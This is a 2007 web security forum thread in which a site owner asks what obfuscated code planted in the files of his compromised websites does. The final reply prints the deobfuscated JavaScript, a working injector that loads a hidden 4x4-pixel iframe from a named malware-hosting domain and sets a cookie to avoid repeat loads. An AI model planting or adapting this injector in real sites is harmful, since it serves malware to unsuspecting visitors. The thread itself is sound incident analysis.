View previous topic :: View next topic |
Author |
Message |
mrconsumer Just Arrived
Joined: 24 Jul 2007 Posts: 0
|
Posted: Tue Jul 24, 2007 8:15 pm Post subject: What Does This Hack Do? |
|
|
Three of my websites were compromised last week, and the following code (or variations of it) was added as the last line of every HTM and PHP file in the root directory.
Can anyone tell me what this does or how to decipher it? (I can provide a text file with this for anyone interested.
Thanks,
MrConsumer
|
|
Back to top |
|
|
Advocate Just Arrived
Joined: 31 Aug 2006 Posts: 0 Location: Amsterdam, NL
|
Posted: Mon Jul 30, 2007 11:20 am Post subject: |
|
|
It looks like obfuscated javascript to be honest...
I haven't got time to confirm what it does at the moment but maybe someone else can have a shot. Additionally you could attempt to run it in an isolated virtual environment and have a look!
|
|
Back to top |
|
|
icujc Just Arrived
Joined: 21 Apr 2005 Posts: 2
|
|
Back to top |
|
|
mrconsumer Just Arrived
Joined: 24 Jul 2007 Posts: 0
|
Posted: Tue Jul 31, 2007 1:29 pm Post subject: |
|
|
I will be happy to provide a text file of the offending code via email. I didn't want to create a situation where this thing could harm someone viewing it, so I turned it into a .gif.
Also, Sophos has analyzed the file, and is adding it to their virus list (but I still don't know what it purportedly would do):
http://www.sophos.com/security/analyses/trojpintadda.html
Edgar
|
|
Back to top |
|
|
lrebrown Just Arrived
Joined: 08 Dec 2005 Posts: 0 Location: UK
|
Posted: Tue Jul 31, 2007 4:58 pm Post subject: |
|
|
you don't need to worry about harming anyone viewing it. when posting your message the html (e.g. <script> tag) will either be stripped from your post, or characters like < and > will be encoded to make them harmless (they will display as text on the page rather than being parsed as html tags).
it's perfectly safe to post it here, so long as the forum is protected against XSS attacks (which it most certainly will be).
|
|
Back to top |
|
|
mrconsumer Just Arrived
Joined: 24 Jul 2007 Posts: 0
|
|
Back to top |
|
|
The_Real_Gandalf Trusted SF Member
Joined: 14 Apr 2004 Posts: 0 Location: Athens,Greece
|
Posted: Tue Sep 25, 2007 10:25 am Post subject: |
|
|
it shows like an incomplete source code for a virus id string. I do not think that it is fully functional , but the best way to test it , is to "install/run" it on an isolated machine with all services running (e.g. WWW, IIS, etc.)
Gandalf
|
|
Back to top |
|
|
jumperinthedoor Just Arrived
Joined: 30 Oct 2007 Posts: 0
|
Posted: Wed Oct 31, 2007 11:52 pm Post subject: |
|
|
It is an obfuscated javascript. It does function and sets an iFrame to 24.update1.classictel.org/html/. This is a site belonging to the Russian Business Network. I tried to wget the 24.update1.classictel.org/html/ to see what malware it was hosting but I can't get there because we block it here. Anyway, here is the unobfuscated script:
function fp(yR,qd){
var jM=new Date();
var Jr= new Date();
Jr.setTime(jM.getTime()+86400000);
document.cookie = yR+"="+escape(qd)+";
expires="+Jr.toGMTString();
}
var qh='s1fTc',pG='1';
var oX='update1.classictel.org',Lt='/html/';
if(document.cookie.indexOf(qh+'='+pG)==-1){
var FD='http://'+(document.location.host != ''?'':RC())+document.location.host.replace(/[^a-z0-9.-]/,'.').replace(/\.+/,'.')+'.'+RC()+'.'+oX+Lt;
var ft=document.createElement('iframe');
ft.setAttribute('src',FD);ft.frameBorder=0; ft.width=4;
ft.height=4;
try {
document.body.appendChild(ft);
fp(qh,pG);
}
catch(e){
document.write('<html><body></body></html>');
document.body.appendChild(ft); fp(qh,pG);
}
}
function RC(){
var KO=24,FR="01234567890abcdef";
var na="";
for(BC=0; BC < KO; BC++) na+= FR.substr(Math.floor(Math.random()*FR.length),1,1);
return na;
}
Update: The site 24.update1.classictel.org/html/ redirects to another site that was taken down by the hosting provider.
|
|
Back to top |
|
|
|